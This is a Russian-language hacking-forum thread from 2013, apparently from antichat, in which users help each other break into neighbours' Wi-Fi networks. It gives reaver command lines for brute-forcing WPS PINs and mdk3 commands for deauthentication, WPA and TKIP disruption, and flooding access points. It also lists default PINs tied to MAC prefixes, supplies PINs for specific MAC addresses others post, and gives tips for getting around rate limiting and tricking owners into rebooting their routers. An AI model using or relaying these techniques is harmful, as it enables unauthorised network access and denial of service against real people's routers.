Ключ d почти тоже что делает Aireplay-ng отключает всех клиентов от AP И не дает подключиться пока не будет остановлена атака !

Ключ g Убивает Шифрование WPA будет лупить по точке и не давать подключаться по WPA пока хозяин не переключится на WEP !!!

Ключ m Отправляет в нокаут Функцию TKIP

Ключ a DOS mode Подключает к точке множество типо клиентов етой функции я не обясню целиком но могу сказать что если на точке стоит лимит подключений то 2-3-4 милиона подключений точно не дадут подключится ато может даже заставят зависнуть роутер ) Ну конечно не дадут подключится хозяину если он ище не подключен а даже если подключен то отключим его ключем d и сразу лупим ключ a и радуемся ) ето только часть с того что я знаю ) ну можеш почитать набрав в консоли Бектрек 5 MDK3 и читаеш что да кчему _)

Все легко меняется только ключ тоисть буква подставляется другая для тех кто не понял )

MDk3 mon0 d -t BSSID и оставляем на некоторое время а лутше на недельку и потом ждем звонок в дрерь откройте милиция

extramo
08.03.2013, 18:04
Всем привет.Недавно открыл для себя метод WPA,первое впечатление отличное,но "легкие" цели кончились,остальные пока никак.Вопрос:подберется ли пин если у точки не фиксированный канал?

buruznyk
08.03.2013, 20:45
Вопрос:подберется ли пин если у точки не фиксированный канал?



Подберется , если вы не фиксируете частотный канал для атаки. reaver -i mon0 -b 00:00:00:00:00:00 -c 11 -e xxxxxx

extramo
08.03.2013, 23:30
Подберется , если вы не фиксируете частотный канал для атаки. reaver -i mon0 -b 00:00:00:00:00:00 -c 11 -e xxxxxx



Использую airslax ничего не прописываю совсем,значит ривер предусматривает что на точке может стоять автоматический выбор канала? Точки которые пытаюсь сломать наз-ся tenda мак адрес начинается C8:3A:35, этот пин 01756401 не подходит,может есть у кого нибудь другие вероятные пины? Пин 46264848 подходит к мак адресам 28:10:7B, BC:F6:85, 1C:7E:E5 точки по умолчанию наз-ся DSL_2640NRU, Home модем длинк

fuckirina
08.03.2013, 23:55
Точки которые пытаюсь сломать наз-ся tenda мак адрес начинается C8:3A:35, этот пин 01756401 не подходит,может есть у кого нибудь другие вероятные пины?



- напиши полностью МАС ...может чё и подберём...



Пин 46264848 подходит к мак адресам 28:10:7B, BC:F6:85, 1C:7E:E5 точки по умолчанию наз-ся DSL_2640NRU, Home модем длинк



- лично у меня на 1C:7E:E5 много раз подходил пин-76229909 ....

buruznyk
10.03.2013, 00:48
Пин 46264848 подходит к мак адресам 28:10:7B, BC:F6:85, 1C:7E:E5 точки по умолчанию наз-ся DSL_2640NRU, Home модем длинк



46264848 этот пин встречается очень часто на точках доступа от разных производителей. У нас в городе все точки доступа, независимо от марки, которые выдает РОСТЕЛЕКОМ при подключении к нету имеют этот пин. Это связано с определенной прошивкой под РОСТЕЛЕКОМ .

buruznyk
10.03.2013, 00:58
значит ривер предусматривает что на точке может стоять автоматический выбор канала?



По умолчанию на всех точках доступа стоит автовыбор канала. Я неоднократно замечал при атаке на точку доступа, она частенько меняет рабочий канал. Поэтому и у ривера по умолчанию стоит автовыбор канала.

extramo
10.03.2013, 11:56
- напиши полностью МАС ...может чё и подберём...



С8:3А:35:1C:F2:51,С8:3А:35:54: D2:31,90:F6:52:5B:E1:B6

AstronomGTC
10.03.2013, 12:36
Всем доброго дня! Пару дней пытаюсь с бука ломануть соседскую точку но пока без результатно!(((Задумался приобрести себе альфу. В начале данного топика человек писал что проблема решилась подключением альфы. Но с тех пор прошло много времени и хотелось бы определится в выбором покупки. Подскажите кто юзал Ralink 3070 и Realtek 8187L на каких чипсетах лучше работает роутер? Ось BACK TRACK 5r3. Роутер нужен именно для фрикинга.

fuckirina
10.03.2013, 12:55
подскажет пин от мака 14 :E6:E4



- это полмака...пиши весь...

fuckirina
10.03.2013, 12:58
С8:3А:35:1C:F2:51,С8:3А:35:54: D2:31,90:F6:52:5B:E1:B6



- попробуй эти...если что подойдёт отпишись...интересно...

С8:3А:35:1C:F2:51 - 18970418

С8:3А:35:542:31 - 55588331

90:F6:52:5B:E1:B6 - 60215581

sobaric
10.03.2013, 23:57
Привет всем. Как командой MDK3 перезагрузить АP ? За рание спасибо.

Dovbnyak
11.03.2013, 03:20
Привет всем. Как командой MDK3 перезагрузить АP ? За рание спасибо.




Напрямую заставить никак а вот если есть клиент и он владелец и знает что надо нажать кнопочку ресет если пропал инет то можно попробовать )

вот тебе пример:

MDK3 mon0 d -t BSSID -e ESSID (Жмем ентер и ждем когда клиент перезагрузит роутер ) Или же спалит его на гале или вибросит в окно Немножко подшутил

Если стоит wpa шиврование тогда пробуем ище так

MDK3 mon0 g -t BSSID -e ESSID (Жмем ентер и ждем когда клиент перезагрузит роутер )

Если есть TKIP то пробуем так :

MDK3 mon0m -j -t BSSID -e ESSID (Жмем ентер и ждем когда клиент перезагрузит роутер )

Вот и все

ПОМНИТЕ НУЖЕН КЛИЕНТ ПОДКЛЮЧЕН К AP

d1nk3r
11.03.2013, 15:29
Не знаю пишу туда или нет, но всё же. (адаптер - ALFA AWUS 036H)

Поломал 2 точки через wps - подключаюсь к одной, сначала скорость ~100кб/с - потом пропадает вообще, хотя вот такой сигнал

http://i52.fastpic.ru/thumb/2013/0311/de/1a14e9e7d72fe0f7f165ca967be02dde.jpeg

На второй точке то же самое, сигнал такой

http://i52.fastpic.ru/thumb/2013/0311/f2/74ea3dade60c0f2296233fd15b9f4af2.jpeg

При просмотре через обычный адаптер этих точек или вообще не видно, или сигнал очень слабый, т.е. они находятся за 100 метров примерно.

Так как я не особо сведущ в wifi, возникает вопрос: может ли быть такое, что роутер жертвы не может выдать хороший сигнал для стабильной скорости. Или стоит лезть в настройки роутера? Подскажите чайнику

buruznyk
11.03.2013, 18:39
может ли быть такое, что роутер жертвы не может выдать хороший сигнал для стабильной скорости. Или стоит лезть в настройки роутера?



Для нормальной работы ALFA AWUS 036H сигнал от роутера, при сканировании командой wash, входящей в состав ривера, должен быть до 66 db ,при 67 и слабее,интернет соединение будет не стабильным.

d1nk3r
11.03.2013, 19:06
Для нормальной работы ALFA AWUS 036H сигнал от роутера, при сканировании командой wash, входящей в состав ривера, должен быть до 66 db ,при 67 и слабее,интернет соединение будет не стабильным.



На первом роутере сигнал -56, -60 максимум, т.е. скорее дело в чём-то другом?

на втором -66, но на нём сейчас даже стабильнее скорость, как мне кажется.

Возможно на первом стоит ограничение по мак-адресу?

Dovbnyak
11.03.2013, 19:12
На первом роутере сигнал -56, -60 максимум, т.е. скорее дело в чём-то другом?

на втором -66, но на нём сейчас даже стабильнее скорость, как мне кажется.

Возможно на первом стоит ограничение по мак-адресу?




Такая фигня встречается на чипе RTL8187 У самого стоит RTL 8187L иногда есть непонятн... глюки не хочет конектить итд... попробуй снять галочку в програме Virtual Wi-fi И поменяй в настройках адаптера схему канала или поменяй на роутере канал на 1 чем више канал тем слабее сигнал пробивается через стен.... ну я думаю все понятно можно попробовать сменить канал и только ) может помочь но мало вероятно )

ILIA69
11.03.2013, 23:55
MAC 00:0C:C30:68:CC

nsin
12.03.2013, 00:35
BC:F6:85:4A:6F:92

После пяти подборов, лимит. Пробовал в WiFiSlax подобрать WPSPinGenerator'ом, 48782265 не подошел. В WPSPin 1.0.5 и WPScrackGUI, ничего нет. Подберите что нибудь по mac'у.

fuckirina
12.03.2013, 04:31
Может кто знает пин от мака 00:0C:C30:68:CC



- а что такие существуют?...научись создавать сообщения сначало...

fuckirina
12.03.2013, 04:37
BC:F6:85:4A:6F:92

После пяти подборов, лимит. Пробовал в WiFiSlax подобрать WPSPinGenerator'ом, 48782265 не подошел. В WPSPin 1.0.5 и WPScrackGUI, ничего нет. Подберите что нибудь по mac'у.



- пробуй самые популярные: 46264848 76229909 18534207 ...если не подойдут запускай Reaver на перебор...

buruznyk
12.03.2013, 09:56
BC:F6:85:4A:6F:92

После пяти подборов, лимит



Попробуй так reaver -i mon0 -b 00:00:00:00:00:00 -c xx -e xxxxxx -r 4:30

sobaric
12.03.2013, 19:09
мне попался один заблокированный АР .Какую команду нужно дать риверу, чтоб взломать блокировку АP ?

uzlob
12.03.2013, 20:04
никакой командой не поможешь, я читал что нужно использовать MDK 3 которая может ребутнуть роутер и вообще напакостить много, если у тебя Ap Rate Limiting но все таки проскакивают PINы в течении часа, то эту точку в конце концов можно вскрыть. Мой рекорд 8.5 дней бук не выключался, Брутил пинами с большим интервалом между (AP Rate Limiting)

uzlob
12.03.2013, 23:25
http://forum.antichat.ru/thread336191.html

Yelenka
13.03.2013, 13:14
А у меня такая ситуация: reaver подобрал к точке WPS PIN, a WPA ключа нет Как можно с этим бороться?

+ Pin cracked in 17 seconds

+ WPS PIN 'xxxxxxxx'

+ Nothing done, nothing to save

вот, как-то так в итоге получается....

Klaatu
13.03.2013, 13:47
А у меня такая ситуация: reaver подобрал к точке WPS PIN, a WPA ключа нет Как можно с этим бороться?



Запусти ривер несколько раз, указав в его параметрах подобранный пин, чтобы только он и перебирался. С раза пятого-десятого точка что-то да отдаст

Однако, скорее всего, в результате ты получишь в качестве PSK 64-значную абракадабру, которую нельзя будет использовать в качестве пароля

Yelenka
13.03.2013, 19:12
Запусти ривер несколько раз, указав в его параметрах подобранный пин, чтобы только он и перебирался. С раза пятого-десятого точка что-то да отдаст

Однако, скорее всего, в результате ты получишь в качестве PSK 64-значную абракадабру, которую нельзя будет использовать в качестве пароля


Утешительно А можно как-нибудь на рутер зайти, предварительно присоединившись к ТД через ПИН?

Klaatu
13.03.2013, 21:11
Утешительно А можно как-нибудь на рутер зайти, предварительно присоединившись к ТД через ПИН?



На роутер по пину зайти можно,но надо четко понимать зачем тебе это надо. Дело в том,что скорее всего,при входе через пин роутер будет переконфигурирован, сменится пароль и название точки доступа. Например,так себя ведут роутеры тплинк. Естественно, сам хозяин на такой роутер зайти уже не сможет,и его это как минимум насторожит

В итоге все заканчивается тем,что хозяин,решив что его роутер просто глюканул, возвращает на место свои старые настройки-имя точки и пароль. И ты снова оказываешься в самом начале пути-у тебя есть пин от точки, но пароля ты не знаешь...

В общем, для начала ты добейся результата от ривера-он либо должен отдать пароль,либо 64значную абракадабру.

Yelenka
14.03.2013, 00:53
На роутер по пину зайти можно,но надо четко понимать зачем тебе это надо. Дело в том,что скорее всего,при входе через пин роутер будет переконфигурирован, сменится пароль и название точки доступа. Например,так себя ведут роутеры тплинк. Естественно, сам хозяин на такой роутер зайти уже не сможет,и его это как минимум насторожит

В итоге все заканчивается тем,что хозяин,решив что его роутер просто глюканул, возвращает на место свои старые настройки-имя точки и пароль. И ты снова оказываешься в самом начале пути-у тебя есть пин от точки, но пароля ты не знаешь...

В общем, для начала ты добейся результата от ривера-он либо должен отдать пароль,либо 64значную абракадабру.



Спасибо!!! Совет сработал: выдал нормальный пароль, правда, после 8 раза

vedemur
15.03.2013, 21:16
всем привет. Ребята, помогите доламать сеть. Доходит до 99,99% и крутит на пине 60739988 всё время. Пробовал по новой запускать реавер с этим пином, он крутит этот пин начиная с 90,05% и проценты растут, а пин тот-же. И ещё, кто-то писал, что можно попробовать подключиться по пину, у меня RTL8187L и я там такого не нахожу. Заранее спасибо.

Klaatu
15.03.2013, 21:33
всем привет. Ребята, помогите доламать сеть. Доходит до 99,99% и крутит на пине 60739988 всё время. Пробовал по новой запускать реавер с этим пином, он крутит этот пин начиная с 90,05% и проценты растут, а пин тот-же. И ещё, кто-то писал, что можно попробовать подключиться по пину, у меня RTL8187L и я там такого не нахожу. Заранее спасибо.



Начни перебор заново с 6060хххх пина. Я в этой теме писал несколькими страницами ранее, как это правильно сделать. Если на 6073 резко перескочит на 90% - значит первая половина подобралась верно, пусть тогда перебирает дальше. Если же эту цифру проскочит, и пойдет дальше 6074 6075 итд - тогда начинай перебор с самого начала.

Пытаться подключаться по пину не нужно, т.к. ты пока даже не знаешь, какой пин правильный...

vedemur
15.03.2013, 21:47
Я уже два раза сканировал с нуля и всё то-же повторяется, не проскакивает, а если вбить этот пин, то проценты растут, пин тот-же и каждый раз в конце процентов пишет WARNING: Receive timeout occurred

Klaatu
15.03.2013, 22:16
Я уже два раза сканировал с нуля и всё то-же повторяется, не проскакивает, а если вбить этот пин, то проценты растут, пин тот-же и каждый раз в конце процентов пишет WARNING: Receive timeout occurred



Я сталкивался с таким, сложно сказать в чем там проблема, готового рецепта для таких точек у меня нет.

По пину можно подключиться, используюя программу qss. Ссылки были в ветке вопрос-ответ. Также будь готов к тому, что точка, после входа через пин, возможно(!), будет автоматически переконфигурирована.

user100
18.03.2013, 23:08
подскажет пин от мака

90:F6:52:B5:9C:35

TP-Link



http://4.firepic.org/4/images/2013-03/18/rcij8ub4idxq.png

fuckirina
19.03.2013, 06:43
подскажет пин от мака

90:F6:52:B5:9C:35

TP-Link



- а вот другие пин-генераторы\калькуляторы требуют вводить не первые а последние 6 знаков мака...

- соответственно и пин другой выдают-19020051

теща
20.03.2013, 14:31
читаем шапку ! за оф бан , не по теме вопрос - аналогично бан!

d1nk3r
27.03.2013, 18:47
Подскажите пожалуйста.

Сначала точка ломалась нормально, отлично шёл подбор, как нашёл первую часть - пошли пакеты m5 m6, но после - ни 1 коннекта к точке, т.е. коннект-то есть, но после пакета m6:

Sending WSC NACK

WPS transaction failed (code: 0x03), re-trying last ping

так и крутиться на 1 пине.

Что это? Защита какая-то на точке что ли?

dpash
27.03.2013, 21:32
d1nk3r, скорее всего "подвис" wps на точке, после её перезагрузки пойдет... Вероятно еще ухудшение сигнала-переместили её, накрыли чем-то

d1nk3r
27.03.2013, 23:13
d1nk3r, скорее всего "подвис" wps на точке, после её перезагрузки пойдет... Вероятно еще ухудшение сигнала-переместили её, накрыли чем-то



Это навряд ли, потому что когда запускаю перебор сначала - он идёт нормально. В чём подвох?

buuubliiik
28.03.2013, 01:13
Можешь параллельно включить wireshark и посмотреть, что происходит?

d1nk3r
28.03.2013, 01:59
Можешь параллельно включить wireshark и посмотреть, что происходит?



Блин, так и думал, что когда-нибудь придётся разбираться в этой проге. Что конкретно там можно увидеть?

buuubliiik
28.03.2013, 02:22
Если повезет - увидишь как работает взломщик, что он отправляет и что приходит обратно. По идее должно работать.

Да: это не "нажми на кнопку - получишь результат".

fuckirina
28.03.2013, 04:22
Подскажите пожалуйста.

Сначала точка ломалась нормально, отлично шёл подбор, как нашёл первую часть - пошли пакеты m5 m6, но после - ни 1 коннекта к точке, т.е. коннект-то есть, но после пакета m6:

Sending WSC NACK

WPS transaction failed (code: 0x03), re-trying last ping

так и крутиться на 1 пине.

Что это? Защита какая-то на точке что ли?



- смотри тут может что и найдёшь для себя... https://code.google.com/p/reaver-wps/issues/list

dimon654
28.03.2013, 13:55
Всем привет!

Подскажите, может у кого такое было.

Получил пин и пароль от точки, но с помощью ни того ни другого не могу подключиться, появляется сообщение о неверном пароле. Я так понял если бы была фильтрация по мак то было бы сообщение просто о невозможности подключения. Роутер походу мтс. Имя сети UniversalRouterMTS2750. С дугими точками таких проблем не было.

d1nk3r
28.03.2013, 19:49
- смотри тут может что и найдёшь для себя... https://code.google.com/p/reaver-wps/issues/list



Спасибо за ссылку.

Короче решил эту проблему таким способом: поставил -N -E опции и каждую ~20 попытку пин проскакивал)))

сдалась таки точка, но всё равно интересно что же это, если у кого было такое, отпишитесь

fuckirina
28.03.2013, 21:24
Спасибо за ссылку.

Короче решил эту проблему таким способом: поставил -N -E опции и каждую ~20 попытку пин проскакивал)))

сдалась таки точка, но всё равно интересно что же это, если у кого было такое, отпишитесь



- не за что...

- ну ты же там по ссылке видел-много причин...это могло быть у каждого своё...

Ihfiniti05
02.04.2013, 15:58
после ввода команды wash -i mon1 -C

Появляються надписи BSSID и другие вот точку доступа ни как не находитю. Почему?

sobaric
02.04.2013, 16:39
нодо писать wash -i mon0 -C -s

Ihfiniti05
02.04.2013, 17:59
нодо писать wash -i mon0 -C -s



ничего не вышло все равно также стоит ни одну точну не находит. Пытаюсь для опыта свой роутер нетгиар взломать.

Адаптер вай-фай у меня на чипсет Atheros AR9287

sobaric
02.04.2013, 18:31
ничего не вышло все равно также стоит ни одну точну не находит. Пытаюсь для опыта свой роутер нетгиар взломать.

Адаптер вай-фай у меня на чипсет Atheros AR9287



Купи выносной адаптер USB. Может нет у тебя сетей которые подерживуют WPS. зашифрованы только WPA2.

Ihfiniti05
02.04.2013, 18:37
У меня ройтер NETGEAR JNR3210-100RUS

WEP

WPA-PSK [TKIP]

WPA2-PSK [AES]

WPA-PSK [TKIP] + WPA2-PSK [AES]

WPA/WPA2 Enterprise

Пытаюсь его взломать. Сейчас галочка стоит на WPA2-PSK [AES].

и есть TP-LINK TL-WN821N Wireless N USB Adapter(802.11b / g / n, USB2.0) перенасной подерживает WPA2-PSK; WPA-PSK; WPA2; WPA; WEP-кодирование с 64-, 128- или 152-битным ключом